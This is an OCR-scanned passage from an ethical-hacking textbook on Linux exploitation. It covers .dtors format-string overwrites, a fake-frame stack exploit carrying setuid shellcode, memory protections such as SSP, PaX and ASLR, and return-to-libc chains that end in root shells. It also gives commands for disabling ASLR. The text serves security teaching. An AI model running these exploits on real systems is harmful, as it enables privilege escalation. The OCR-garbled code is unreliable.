Jv_Regis ter Classes 

_CTOR_END 

CTOR_LIST 

_DTOR_END 

DTOR_LIST 

_EH_FRAME_BEGIN 

_FRAME_END 

JCR_END 

_JCR_LIST 

_bss_start 
_data_start 
_do_global_ctors_aux 
_do_global_dtors__aux 
dso handle 



w gmon 

U libc 

08049540 A _edata 
08049544 A _end 
<truncated> 



start 

start main0@GLIBC 



2.0 



And to view a section, say .dtors, you would simply use the objdump tool: 

$ objdump -s -j .dtors ,/fmtstr 

,/fmtstr: file format elf32-i386 

Contents of section .dtors: 

8049518 ffffffff 00000000 

$ 

DTOR Section 

In C/C++, the destructor (DTOR) section provides a way to ensure that some process is 
executed upon program exit. For example, if you wanted to print a message every time 
the program exited, you would use the destructor section. The DTOR section is stored 
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in the binary itself, as shown in the preceding nm and objdump command output. 
Notice how an empty DTOR section always starts and ends with 32-bit markers: Oxffffffff 
and 0x00000000 (NULL). In the preceding fmtstr case, the table is empty. 

Compiler directives are used to denote the destructor as follows: 

$ cat dtor.c 
//dtor . c 

#include <stdio.h> 

static void goodbye (void) attribute ( (destructor) ) ; 

main ( ) { 

printf ( "During the program, hello\n"); 
exit (0) ; 

) 

void goodbye (void) { 

printf ( "After the program, bye\n"); 

} 

$ gcc -o dtor dtor.c 
$ ./dtor 

During the program, hello 
After the program, bye 



Now let's take a closer look at the file structure by using nm and grepping for the 
pointer to the goodbye() function: 

$ nm ./dtor I grep goodbye 
08048386 t goodbye 

Next, let's look at the location of the DTOR section in the file: 



$ nm ./dtor I grep DTOR 

08049508 d DTOR_END 

08049500 d DTOR_LIST 

Finally, let's check the contents of the .dtors section: 



$ objdump -s -j .dtors ./dtor 
./dtor: file format elf32-i386 

Contents of section .dtors: 

8049500 ffffffff 86830408 00000000 

$ 



Yep, as you can see, a pointer to the goodbye() function is stored in the DTOR sec- 
tion between the Oxffffffff and 0x00000000 markers. Again, notice the little-endian 
notation. 



Putting It All Together 

Now back to our vulnerable format string program, fmtstr. Recall the location of the 
DTORS section: 

$ nm ./fmtstr I grep DTOR #notice how we are only interested in DTOR 

0804951c d DTOR_END 

08049518 d DT0R_LIST 
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and the initial values (empty): 

$ objdump -s -j .dtors ./fmtstr 
./fmtstr: file format elf 32 -i 386 

Contents of section .dtors: 

8049518 ffffffff 00000000 

$ 



It turns out that if we overwrite either an existing function pointer in the DTOR sec- 
tion or the ending marker (0x00000000) with our target return address (in this case, 
our shellcode address), the program will happily jump to that location and execute. To 

get the first pointer location or the end marker, simply add 4 bytes to the DTOR_ 

LIST location. In our case, this is 

0x08049518 + 4 = 0x0804951c (which goes in our second memory slot, 
bolded in the following code) 

Follow the same first column of Table 12-2 to calculate the required format string 
to overwrite the new memory address 0x0804951c with the same address of the shell- 
code as used earlier: 0xbfffff50 in our case. Here goes! 

$ ./fmtstr 'printf 

" \xle\x 95 \x 04 \x 0 8 \xlc\x 95 \x 04 \x 08" ' % . 4 9143 x% 4 \$hn% . 1 6209 x% 5 \$hn 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000 
<truncated> 

000000000000000000000000000000000000000000000000000000000000000000000000000 

000000000000000000000000000000000000000000000000000000000000000000000000000 

000000000000000000000000000000000000000000000000000000000000000000000000000 

000000000000000000000000000000000000000000000000000000000000000000000000000 

0000000000000000000000000000648 

Canary at 0 x 08049440 = 0 x 00000000 

sh- 2 . 05 b# whoami 

root 

sh- 2 . 05 b# id -u 
0 

sh- 2 . 05 b# exit 
exit 
$ 



Success! Relax, you earned it. 

There are many other useful locations to overwrite; for example: 

• Global offset table 

• Global function pointers 

• atexit handlers 

• Stack values 

• Program-specific authentication variables 

And there are many more; see "References" for more ideas. 
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Memory Protection Schemes 

Since buffer overflows and heap overflows have come to be, many programmers have 
developed memory protection schemes to prevent these attacks. As we will see, some 
work, some don't. 

Compiler Improvements 

Several improvements have been made to the gcc compiler, starting in GCC 4.1. 

Libsafe 

Libsafe is a dynamic library that allows for the safer implementation of the following 
dangerous functions: 

• strcpy() 

• strcat() 

• sprintf(), vsprintf() 

• getwd() 

• gets() 

• realpath() 

• fscanf(), scanf(), sscanf() 

Libsafe overwrites these dangerous libc functions, replacing the bounds and input 
scrubbing implementations, thereby eliminating most stack-based attacks. However, 
there is no protection offered against the heap-based exploits described in this chapter. 

StackShield, StackGuard, and Stack Smashing Protection (SSP) 

StackShield is a replacement to the gcc compiler that catches unsafe operations at com- 
pile time. Once installed, the user simply issues shieldgcc instead of gcc to compile pro- 
grams. In addition, when a function is called, StackShield copies the saved return address 
to a safe location and restores the return address upon returning from the function. 
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StackGuard was developed by Crispin Cowan of Immunix.com and is based on a 
system of placing "canaries" between the stack buffers and the frame state data. If a buf- 
fer overflow attempts to overwrite saved eip, the canary will be damaged and a violation 
will be detected. 

Stack Smashing Protection (SSP), formerly called ProPolice, is now developed by 
Hiroaki Etoh of IBM and improves on the canary-based protection of StackGuard by 
rearranging the stack variables to make them more difficult to exploit. In addition, a 
new prolog and epilog are implemented with SSP. 

The following is the previous prolog: 



080483c4 <main>: 








80483c4 


55 




push 


%ebp 


80483c5 


89 e5 




mov 


%esp, %ebp 


80483c7 


83 ec 


18 


sub 


$0x18, %esp 


The new prolog 


is 






080483c4 <main>: 








80483c4 


8d 4c 


24 04 


lea 


0x4 (%esp) , % 


80483c8 


83 e4 


fO 


and 


$0xf f f f f f f 0 


80483cb 


ff 71 


fc 


pushl 


-0x4 (%ecx) 


80483ce 


55 




push 


%ebp 


80483cf 


89 e5 




mov 


%esp, %ebp 


80483dl 


51 




push 


%ecx 


80483d2 


83 ec 


24 


sub 


$0x24 , %esp 



As shown in Figure 12-2, a pointer is provided to ArgC and checked after the return 
of the application, so the key is to control that pointer to ArgC, instead of saved Ret. 
Because of this new prolog, a new epilog is created: 



80483ec: 


83 c4 


24 


add 


$0x24 , %esp 


80483ef : 


59 




pop 


%ecx 


80483f0 : 


5d 




pop 


%ebp 


80483fl : 


8d 61 


fc 


lea 


-0x4 (%ecx) , %esp 


80483f4 : 


c3 




ret 





Back in Chapter 11, we discussed how to handle overflows of small buffers by using 
the end of the environment segment of memory. Now that we have a new prolog and 
epilog, we need to insert a fake frame including a fake Ret and fake ArgC, as shown in 
Figure 12-3. 



Figure 1 2-2 

Old and new prolog 



Prolog Prior Prolog After GCC 4.1 







buff 






Ptr to ArgC 






EBP 


buff 




Ptr to Ret 


EBP 




Pad 


Ret 


◄ — Control 


Ret 


ArgC 


this 


ArgC 


ArgV 




ArgV 



Control 

this 
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Figure 1 2-3 

Using a fake frame to 
attack small buffers 




Oxbfffffff 



Using this fake frame technique, we can control the execution of the program by 
jumping to the fake ArgC, which will use the fake Ret address (the actual address of the 
shellcode). The source code of such an attack follows: 

$ cat exploit2.c 

//exploit2.c works locally when the vulnerable buffer is small. 

#include <stdlib.h> 

#include <stdio.h> 

#include <unistd.h> 

#include <string.h> 

#define VULN " . /smallbuf f " 

#define SIZE 14 

/•k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k 

* The following format is used 

* Sshellcode (eip) - must point to the shell code address 

* argc - not really using the contents here 

* shellcode 

* . /smallbuf f 

kkkkkkkkkkkkkk-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-k-kkkkkkkkkkkj 

char shellcode!] = //Alephl's famous shellcode, see ref. 

"\xf f \xf f \xf f\xf f \xf f \xf f \xf f \xf f " // place holder for Sshellcode and argc 

"\x31\xc0\x31\xdb\xb0\xl7\xcd\x80" //setuid(O) first 

"\xeb\xlf \x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 

"\x89\xf 3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 

" \x80\xe8 \xdc\xf f \xf f \xf f /bin/ sh" ; 
int main(int argc, char **argv) { 

// injection buffer 
char p [SIZE] ; 

// put the shellcode in target's envp 
char *env[] = { shellcode, NULL }; 
int *ptr, i, addr , addr_argc, addr_eip; 

// calculate the exact location of the shellcode 
addr = Oxbffffffa - strlen (shellcode) - strlen (VULN) ; 
addr += 4 ; 
addr_argc = addr; 
addr_eip = addr_argc + 4; 

fprintf (stderr, "[***] using fake argc address: %#010x\n", addr_argc) ; 
fprintf (stderr, "[***] using shellcode address: %#010x\n", addr_eip) ; 

// set the address for the modified argc 

shellcode [0] = (unsigned char) (addr_eip & OxOOOOOOff ) ; 

shellcode [1] = (unsigned char) ( (addr_eip & OxOOOOffOO) >\>8) ; 
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shellcode[2] = (unsigned char) ( (addr_eip & OxOOffOOOO) >\>16) ; 
shellcode[3] = (unsigned char) ( (addr_eip & OxffOOOOOO) >\ >2 4 ) ; 

/* fill buffer with computed address */ 

/* alignment issues, must offset by two */ 
p [ 0 ] = ' A ' ; 
p[l] = 'A' ; 

ptr = (int * ) &p [2] ; 



for (i = 2; i < SIZE; i += 4) { 
*ptr++ = addr; 



/* this is the address for exploiting with 
* gcc -mpref erred-stack-boundary=2 -o smallbuff smallbuff.c */ 
*ptr = addr_eip; 



//call the program with execle, which takes the environment as input 
execle (VULN, "smallbuff" , p, NULL, env) ; 
exit ( 1 ) ; 




NOTE The preceding code actually works for both cases, with and without 
stack protection on. This is a coincidence, due to the fact that it takes 4 bytes 
less to overwrite the pointer to ArgC than it did to overwrite saved Ret 
under the previous way of performing buffer overflows. 



The preceding code can be executed as follows: 

# gcc -o exploit2 exploit2.c 
#chmod u+s exploit2 

tsu joeuser //switch to a normal user (any) 

$ . /exploit2 

[***] using fake argc address: 0xbfffffc2 
[***] using shellcode address: 0xbfffffc6 
sh-2.05b# whoami 
root 

sh-2.05b# exit 

exit 

$exit 



SSP has been incorporated in GCC (starting in version 4.1) and is on by default. It 
may be disabled with the -fno-stack-protector flag. 

You may check for the use of SSP by using the objdump tool: 

joe@BT (/tmp) : $ objdump -d test I grep stack_chk_fail 
080482e8 < stack_chk_f ail0plt> : 

80483f8: e8 eb fe ff ff call 80482e8 < stack_chk_f ail@plt> 

Notice the call to the stack_chk_fail@plt function, compiled into the binary. 



NOTE As implied by their names, none of the tools described in this section 
offers any protection against heap-based attacks. 
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Non-Executable Stack (gcc based) 

GCC has implemented a non-executable stack, using the GNU_STACK ELF markings. 
This feature is on by default (starting in version 4.1) and may be disabled with the -z 
execstack flag, as shown here: 

joe0BT (/tmp) : $ gcc -o test test.c && readelf -1 test | grep -i stack 
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 

joe@BT (/tmp) : $ gcc -z execstack -o test test.c && readelf -1 test | grep -i stack 
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4 

Notice that in the first command the RW flag is set in the ELF markings, and in the 
second command (with the -z execstack flag) the RWE flag is set in the ELF markings. 
The flags stand for read (R), write (W), and execute (E). 

Kernel Patches and Scripts 

There are many protection schemes introduced by kernel-level patches and scripts; 
however, we will mention only a few of them. 

Non-Executable Memory Pages (Stacks and Heaps) 

Early on, developers realized that program stacks and heaps should not be executable 
and that user code should not be writable once it is placed in memory. Several imple- 
mentations have attempted to achieve these goals. 

The Page-eXec (PaX) patches attempt to provide execution control over the stack 
and heap areas of memory by changing the way memory paging is done. Normally, a 
page table entry (PTE) exists for keeping track of the pages of memory and caching 
mechanisms called data and instruction translation look-aside buffers (TLBs). The TLBs 
store recently accessed memory pages and are checked by the processor first when ac- 
cessing memory. If the TLB caches do not contain the requested memory page (a cache 
miss), then the PTE is used to look up and access the memory page. The PaX patch 
implements a set of state tables for the TLB caches and maintains whether a memory 
page is in read/write mode or execute mode. As the memory pages transition from read / 
write mode into execute mode, the patch intervenes, logging and then killing the pro- 
cess making this request. PaX has two methods to accomplish non-executable pages. 
The SEGMEXEC method is faster and more reliable, but splits the user space in half to 
accomplish its task. When needed, PaX uses a fallback method, PAGEEXEC, which is 
slower but also very reliable. 

Red Hat Enterprise Server and Fedora offer the ExecShield implementation of non- 
executable memory pages. Although quite effective, it has been found to be vulnerable 
under certain circumstances and to allow data to be executed. 

Address Space Layout Randomization (ASLR) 

The intent of ASLR is to randomize the following memory objects: 

• Executable image 

• Brk() -managed heap 
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• Library images 

• Mmap() -managed heap 

• User space stack 

• Kernel space stack 

PaX, in addition to providing non-executable pages of memory, fully implements 
the preceding ASLR objectives, grsecurity (a collection of kernel-level patches and 
scripts) incorporates PaX and has been merged into many versions of Linux. Red Hat 
and Fedora use a Position Independent Executable (PIE) technique to implement ASLR. 
This technique offers less randomization than PaX, although they protect the same 
memory areas. Systems that implement ASLR provide a high level of protection from 
"return into libc" exploits by randomizing the way the function pointers of libc are 
called. This is done through the randomization of the mmapQ command and makes 
finding the pointer to system() and other functions nearly impossible. However, using 
brute-force techniques to find function calls like system() is possible. 

On Debian- and Ubuntu-based systems, the following command can be used to 
disable ASLR: 

root@quazi (/tmp) : # echo 0 > /proc/sys/kernel/randomize_va__space 

On Red Hat-based systems, the following commands can be used to disable ASLR: 

root@quazi (/tmp) : # echo 1 > /proc/sys/kernel/exec-shield 
root@quazi ( /tmp) : # echo 1 > /proc/sys/kernel/exec-shield- randomize 

Return to libc Exploits 

"Return to libc" is a technique that was developed to get around non-executable stack 
memory protection schemes such as PaX and ExecShield. Basically, the technique uses 
the controlled eip to return execution into existing glibc functions instead of shellcode. 
Remember, glibc is the ubiquitous library of C functions used by all programs. The li- 
brary has functions like system() and exit(), both of which are valuable targets. Of 
particular interest is the system() function, which is used to ran programs on the sys- 
tem. All you need to do is munge (shape or change) the stack to trick the system() func- 
tion into calling a program of your choice, say /bin/sh. 

To make the proper systemQ function call, we need our stack to look like this: 



Saved EIP 

I 



Stack Grows 



Overflow 



Overflow 



Addr of 
systemQ 



Filler 



Addr of 
"/bin/sh" 



Top of Stack 
Lower Memory 



t 

Return Address 
After systemQ 



Bottom of Stack 
Higher Memory 
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We will overflow the vulnerable buffer and exactly overwrite the old saved eip with 
the address of the glibc system() function. When our vulnerable main() function re- 
turns, the program will return into the systemQ function as this value is popped off the 
stack into the eip register and executed. At this point, the system() function will be 
entered and the systemQ prolog will be called, which will build another stack frame on 
top of the position marked "Filler," which for all intents and purposes will become our 
new saved eip (to be executed after the systemQ function returns). Now, as you would 
expect, the arguments for the systemQ function are located just below the new saved 
eip (marked "Filler" in the diagram). Since the systemQ function is expecting one argu- 
ment (a pointer to the string of the filename to be executed), we will supply the point- 
er of the string "/bin/sh" at that location. In this case, we don't actually care what we 
return to after the system function executes. If we did care, we would need to be sure to 
replace Filler with a meaningful function pointer like exitQ. 

Let's look at an example on a Slax bootable CD (BackTrack v.2.0): 

BT book $ uname -a 

Linux BT 2.6.18-rc5 #4 SMP Mon Sep 18 17:58:52 GMT 2006 i686 i686 i386 GNU/ 
Linux 

BT book $ cat /etc/slax-version 
SLAX 6.0.0 




NOTE Stack randomization makes these types of attacks very hard (not 
impossible) to do. Basically, brute force needs to be used to guess the 
addresses involved, which greatly reduces your odds of success. As it turns out, 
the randomization varies from system to system and is not truly random. 



Start by switching user to root and turning off stack randomization: 

BT book $ su 
Password: **** 

BT book # echo 0 > /proc/sys/kernel/randomize_va_space 



Take a look at the following vulnerable program: 

BT book #cat vuln2.c 
/* small buf vuln prog */ 
int main(int argc, char * argv[]){ 
char buffer [7] ; 
strcpy (buf fer , argv[l]); 
return 0; 

} 



As you can see, this program is vulnerable due to the strcpy command that copies 
argv[l] into the small buffer. Compile the vulnerable program, set it as SUID, and re- 
turn to a normal user account: 

BT book # gcc -o vuln2 vuln2 . c 
BT book # chown root . root vuln2 
BT book # chmod +s vuln2 
BT book # Is -1 vuln2 

-rwsr-sr-x 1 root root 8019 Dec 19 19:40 vuln2* 
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BT book # exit 
exit 

BT book $ 

Now we are ready to build the "return to libc" exploit and feed it to the vuln2 pro- 
gram. We need the following items to proceed: 

• Address of glibc system() function 

• Address of the string "/bin/sh" 

It turns out that functions like system() and exit() are automatically linked into 
binaries by the gcc compiler. To observe this fact, start the program with gdb in quiet 
mode. Set a breakpoint on main(), and then run the program. When the program halts 
on the breakpoint, print the locations of the glibc function called system(). 

BT book $ gdb -q vuln2 

Using host libthread_db library " /lib/tls/libthread_db . so . 1 " . 

(gdb) b main 

Breakpoint 1 at 0x80483aa 
( gdb ) r 

Starting program: /mnt/sdal/book/book/vuln2 

Breakpoint 1, 0x080483aa in main () 

(gdb) p system 

$1 = {ctext variable, no debug info>} 0xb7ed86e0 <system> 

(gdb) q 

The program is running. Exit anyway? (y or n) y 
BT book $ 

Another cool way to get the locations of functions and strings in a binary is by 
searching the binary with a custom program as follows: 

BT book $ cat search. c 

/* Simple search routine, based on Solar Designer's lpr exploit. */ 

#include <stdio.h> 

#include <dlfcn.h> 

#include <signal.h> 

#include <setjmp.h> 

int step; 
jmp_buf env; 

void fault () { 

if (step<0) 

longjmp (env, 1) ; 
else { 

printf ( "Can ' t find /bin/sh in libc, use env instead. .. \n" ) ; 
exit ( 1 ) ; 

} 

} 

int main (int argc, char **argv) { 
void ^handle; 
int *sysaddr, *exitaddr; 
long shell; 
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char examp [5 12]; 
char *args [3] ; 
char *envs [ 1 ] ; 
long *lp; 

handle=dlopen (NULL, RTLD_LOCAL) ; 

* (void **) (&sysaddr) =dlsym (handle, "system" ) ; 

sysaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address 
printf ("system ( ) found at %08x\n" , sysaddr ) ; 

* (void **) (Sexitaddr) =dlsym (handle, "exit") ; 

exitaddr+=4096 ; // using pointer math 4096*4=16384=0x4000=base address 
printf ("exit ( ) found at %08x\n" , exitaddr ) ; 

// Now search for /bin/sh using Solar Designer's approach 
if (set jmp (env) ) 
step=l ; 
else 

step=-l; 

shell= (int) sysaddr; 
signal (SIGSEGV, fault) ; 
do 

while (memcmp ( (void *) shell, "/bin/sh", 8)) shell+=step; 

//check for null byte 

while (! (shell & Oxff) || ! (shell & OxffOO) || ! (shell & OxffOOOO) 

| | ! (shell & OxffOOOOOO) ) ; 

printf ("\"/bin/sh\" found at %08x\n" , shell+16384 ) ; // 16384=0x4000=base addr 



The preceding program uses the dlopen() and dlsym() functions to handle objects 
and symbols located in the binary. Once the system() function is located, the memory 
is searched in both directions, looking for the existence of the "/bin/sh" string. The "/ 
bin/sh" string can be found embedded in glibc and keeps the attacker in this case from 
depending on access to environment variables to complete the attack. Finally, the value 
is checked to see if it contains a NULL byte and the location is printed. You may cus- 
tomize the preceding program to look for other objects and strings. Let's compile the 
preceding program and test-drive it: 

BT book $ 

BT book $ gcc -o search -ldl search. c 

BT book $ ./search 

system () found at b7ed86e0 

exit() found at b7ece3a0 

"/bin/sh" found at b7fc04c7 

A quick check of the preceding gdb value shows the same location for the systemQ 
function: success! 

We now have everything required to successfully attack the vulnerable program us- 
ing the return to libc exploit. Putting it all together, we see 

BT book $ . /vuln2 'perl -e 'print "AAAA"x7 . 

"\xe0\x8 6\xed\xb7 " , "BBBB" , " \xc7 \x04 \xf c\xb7 " ' 
sh-3.1$ id 

uid=1001 (joe) gid=100 (users) groups=100 (users) 
sh-3.1$ exit 
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exit 

Segmentation fault 
BT book $ 

Notice that we got a user-level shell (not root), and when we exited from the shell, 
we got a segmentation fault. Why did this happen? The program crashed when we left 
the user-level shell because the filler we supplied (0x42424242) became the saved eip 
to be executed after the system() function. So, a crash was the expected behavior when 
the program ended. To avoid that crash, we will simply supply the pointer to the exit() 
function in that filler location: 

BT book $ ,/vuln2 'perl -e 'print "AAAA"x7 . 

\xe0\x8 6\xed\xb7 " , "\xa0\xe3\xec\xb7" , " \xc7\x04 \xf c\xb7 " ' 
sh-3.1# id 

uid=0 (root) gid=0(root) groups=100 (users) 

sh-3.1# exit 

exit 

BT book $ 

As for the lack of root privilege, the system() function drops privileges when it calls 
a program. To get around this, we need to use a wrapper program, which will contain 
the system function call. Then, we will call the wrapper program with the execl() func- 
tion that does not drop privileges. The wrapper will look like this: 

BT book $ cat wrapper. c 
int main ( ) { 
setuid (0) ; 
setgid (0) ; 
system ("/bin/sh" ) ; 

} 

BT book $ gcc -o wrapper wrapper. c 

Notice that we do not need the wrapper program to be SU1D. Now we need to call 
the wrapper with the exed() function like this: 

execl ("./wrapper", "./wrapper", NULL) 

We now have another issue to work through: the execl() function contains a NULL 
value as the last argument. We will deal with that in a moment. First, let's test the 
execl() function call with a simple test program and ensure that it does not drop privi- 
leges when run as root: 

BT book $ cat test_execl.c 
int main ( ) { 

execl (". /wrapper" , "./wrapper", 0) ; 

} 



Compile and make SU1D like the vulnerable program vuln2.c: 

BT book $ gcc -o test_execl test_execl.c 
BT book $ su 
Password: **** 

BT book # chown root. root test_execl 
BT book # chmod +s test_execl 
BT book # Is -1 test_execl 

-rwsr-sr-x 1 root root 8039 Dec 20 00:59 test_execl* 

BT book # exit 
exit 
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Run it to test the functionality: 

BT book $ ,/test_execl 
sh-3.1# id 

uid=0(root) gid=0(root) groups=100 (users) 

sh-3.1# exit 

exit 

BT book $ 



Great, we now have a way to keep the root privileges. Now all we need is a way to 
produce a NULL byte on the stack. There are several ways to do this; however, for illustra- 
tive purposes, we will use the printfQ function as a wrapper around the execlQ function. 
Recall that the %hn format token can be used to write into memory locations. To make 
this happen, we need to chain together more than one libc function call, as shown here: 



Saved EIP 

I Stack Grows 



Overflow 


Addr of 
print() 


Addr of 
execlQ 


Addr of 
"%3\$n" 


Addr of 
"./wrapper" 


Addr of 
"./wrapper" 


Addr of 
HERE 



Top of Stack ^ Bottom of Stack 

Lower Memory Return Address Higher Memory 

After printQ 



Just like we did before, we will overwrite the old saved eip with the address of the 
glibc printfQ function. At that point, when the original vulnerable function returns, 
this new saved eip will be popped off the stack and printfQ will be executed with the 
arguments starting with "%3\$n", which will write the number of bytes in the format 
string up to the format token (0x0000) into the third direct parameter. Since the third 
parameter contains the location of itself, the value of 0x0000 will be written into that 
spot. Next, the execlQ function will be called with the arguments from the first "./wrap- 
per" string onward. Voila, we have created the desired execlQ function on-the-fly with 
this selfmodifying buffer attack string. 

In order to build the preceding exploit, we need the following information: 



• The address of the printfQ function 

• The address of the execlQ function 

• The address of the "%3\$n" string in memory (we will use the environment 
section) 

• The address of the "./wrapper" string in memory (we will use the environment 
section) 

• The address of the location we wish to overwrite with a NULL value 



Starting at the top, let's get the addresses: 

BT book $ gdb -q vuln2 

Using host libthread_db library " /lib/tls/libthread_db . so . 1 " . 
(gdb) b main 
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Breakpoint 1 at 0x80483aa 
( gdb ) r 

Starting program: /mnt/sdal/book/book/vuln2 

Breakpoint 1, 0x080483aa in main () 

(gdb) p printf 

$1 = {Ctext variable, no debug info>} 0xb7ee6580 <printf> 

(gdb) p execl 

$2 = {ctext variable, no debug info>} 0xb7f2f870 <execl> 

(gdb) q 

The program is running. Exit anyway? (y or n) y 
BT book $ 

We will use the environment section of memory to store our strings and retrieve 
their location with our handy get_env.c utility: 

BT book $ cat get_env.c 

//getenv.c 

#include <stdlib.h> 

int main(int argc, char *argv[]){ 

char * addr; //simple string to hold our input in bss section 
addr = getenv (argv [ 1 ] ) ; //initialize the addr var with input 
printf ("%s is located at %p\n", argv[l], addr ); //display location 

} 



Remember that the get_env program needs to be the same size as the vulnerable 
program, in this case vuln2 (five characters): 



BT book $ gcc -o gtenv get_env.c 



Okay, we are ready to place the strings into memory and retrieve their locations: 

BT book $ export FMTSTR="%3\$n" //escape the $ with a backslash 

BT book $ echo $FMTSTR 

%3$n 

BT book $ ./gtenv FMTSTR 
FMTSTR is located at 0xbffffde5 
BT book $ 

BT book $ export WRAPPER=" . /wrapper" 

BT book $ echo $WRAPPER 
. /wrapper 

BT book $ ./gtenv WRAPPER 
WRAPPER is located at 0xbffffe02 
BT book $ 

We have everything except the location of the last memory slot of our buffer. To 
determine this value, first we find the size of the vulnerable buffer. With this simple 
program, we have only one internal buffer, which will be located at the top of the stack 
when inside the vulnerable function main(). In the real world, a little more research 
will be required to find the location of the vulnerable buffer by looking at the disas- 
sembly and some trial and error. 



BT book $ gdb -q vuln2 

Using host libthread_db library " /lib/tls/libthread_db . so . 1 " . 
(gdb) b main 

Breakpoint 1 at 0x80483aa 



PART III 




Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

248 



( gdb ) r 

Starting program: /mnt/sdal/book/book/vuln2 

Breakpoint 1, 0x080483aa in main () 

(gdb) disas main 

Dump of assembler code for function main: 
0x080483a4 <main+0>: push %ebp 

0x080483a5 <main+l>: mov %esp,%ebp 

0x080483a7 <main+3>: sub $0x18, %esp 

<truncated for brevity> 



Now that we know the size of the vulnerable buffer and compiler-added pad- 
ding (0x18 = 24), we can calculate the location of the sixth memory address by 
adding 24 + 6*4 = 48 = 0x30. Since we will place 4 bytes in that last location, the total 
size of the attack buffer will be 52 bytes. 

Next, we will send a representative-size (52 bytes) buffer into our vulnerable pro- 
gram and find the location of the beginning of the vulnerable buffer with gdb by print- 
ing the value of $esp: 

(gdb) r 'perl -e 'print "AAAA"xl3 ' ' Quit 
Starting program: /mnt/sdal/book/book/vuln2 'perl -e 'print "AAAA"xl3 ' ' Quit 

Breakpoint 1, 0x080483aa in main () 

(gdb) p $esp 

$1 = (void *) Oxbf f f f 560 

(gdb) q 

The program is running. Exit anyway? (y or n) y 
BT book $ 

Now that we have the location of the beginning of the buffer, add the calculated 
offset from earlier to get the correct target location (sixth memory slot after our over- 
flowed buffer): 

Oxbf fff 560 + 0x30 = 0xbffff590 

Finally, we have all the data we need, so let's attack! 

BT book $ . /vuln2 'perl -e 'print "AAAA"x7 . 

" \x80\x65\xee\xb7 " . "\x70\xf 8\xf2\xb7" . "\xe5\xfd\xf f \xbf " . "\x02\xfe\xf f \ 
xbf " . "\x02\xfe\xf f \xbf " . " \x90\xf 5\xf f \xbf " ' 
sh-3.1# exit 
exit 

BT book $ 

Woot! It worked. Some of you may have realized that a shortcut exists here. If you 
look at the last illustration, you will notice the last value of the attack string is a NULL. 
Occasionally, you will run into this situation. In that rare case, you don't care if you 
pass a NULL byte into the vulnerable program, as the string will terminate by a NULL 
anyway. So, in this canned scenario, you could have removed the printf() function and 
simply fed the execl() attack string as follows: 

. /vuln2 [filler of 28 bytes] [&execl] [&exit] [./wrapper] [./wrapper] [\x00] 



Try it: 
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BT book $ . /vuln2 'perl -e 'print "AAAA"x7 . 

"\x70\xf 8\xf2\xb7" . " \xa0\xe3\xec\xb7 " . "\x02\xfe\xf f \xbf " . "\x02\xfe\xf f \ 
xbf " . " \x00" ' ' 

sh-3.1# exit 
exit 

BT book $ 

Both ways work in this case. You will not always be as lucky, so you need to know 
both ways. See the "References" section for even more creative ways to return to libc. 

Bottom Line 

Now that we have discussed some of the more common techniques used for memory 
protection, how do they stack up? Of the ones we reviewed, ASLR (PaX and PIE) and 
non-executable memory (PaX and ExecShield) provide protection to both the stack and 
the heap. StackGuard, StackShield, SSP, and Libsafe provide protection to stack-based 
attacks only. The following table shows the differences in the approaches. 



Memory Protection Scheme 


Stack-Based Attacks 


Heap-Based Attacks 


No protection used 


Vulnerable 


Vulnerable 


StackGuard/StackShield, SSP 


Protection 


Vulnerable 


PaX/ExecShield 


Protection 


Protection 


Libsafe 


Protection 


Vulnerable 


ASLR (PaX/PIE) 


Protection 


Protection 
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Shellcode Strategies 



CHAPTER 



This chapter discusses various factors you may need to consider when designing or se- 
lecting a payload for your exploits. The following topics are covered: 

• User space shellcode 

• Other shellcode considerations 

• Kernel space shellcode 

In Chapters 11 and 12, you were introduced to the idea of shellcode and shown 
how it is used in the process of exploiting a vulnerable computer program. Reliable 
shellcode is at the heart of virtually every exploit that results in "arbitrary code execu- 
tion," a phrase used to indicate that a malicious user can cause a vulnerable program to 
execute instructions provided by the user rather than the program. In a nutshell, shell- 
code is the arbitrary code that is being referred to in such cases. The term "shellcode" 
(or "shell code") derives from the fact that in many cases, malicious users utilize code 
that provides them with either shell access to a remote computer on which they do not 
possess an account or, alternatively, access to a shell with higher privileges on a com- 
puter on which they do have an account. In the optimal case, such a shell might provide 
root- or administrator-level access to a vulnerable system. Over time, the sophistication 
of shellcode has grown well beyond providing a simple interactive shell, to include 
such capabilities as encrypted network communications and in-memory process ma- 
nipulation. To this day, however, "shellcode" continues to refer to the executable com- 
ponent of a payload designed to exploit a vulnerable program. 



User Space Shellcode 

The majority of programs that typical computer users interact with are said to run in 
user space. User space is that portion of a computer's memory space dedicated to run- 
ning programs and storing data that has no need to deal with lower-level system issues. 
That lower-level behavior is provided by the computer's operating system, much of 
which runs in what has come to be called kernel space, since it contains the core, or 
kernel, of the operating system code and data. 



251 




Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

252 



System Calls 

Programs that run in user space and require the services of the operating system must 
follow a prescribed method of interacting with the operating system, which differs from 
one operating system to another. In generic terms, we say that user programs must per- 
form "system calls" to request that the operating system perform some operation on 
their behalf. On many x86-based operating systems, user programs can make system 
calls by utilizing a software-based interrupt mechanism via the x86 int 0x80 instruction 
or the dedicated sysenter system call instruction. The Microsoft Windows family of 
operating systems is somewhat different, in that it generally expects user programs to 
make standard function calls into core Windows library functions that will handle the 
details of the system call on behalf of the user. Virtually all significant capabilities re- 
quired by shellcode are controlled by the operating system, including file access, net- 
work access, and process creation; as such, it is important for shellcode authors to un- 
derstand how to access these services on the platforms for which they are authoring 
shellcode. You will learn more about accessing Linux system calls in Chapter 14. The 
x86 flavors of BSD and Solaris use a very similar mechanism, and all three are well 
documented by the Last Stage of Delirium (LSD) in their "UNIX Assembly Codes De- 
velopment" paper (see "References"). 

Making system calls in Windows shellcode is a little more complicated. On the 
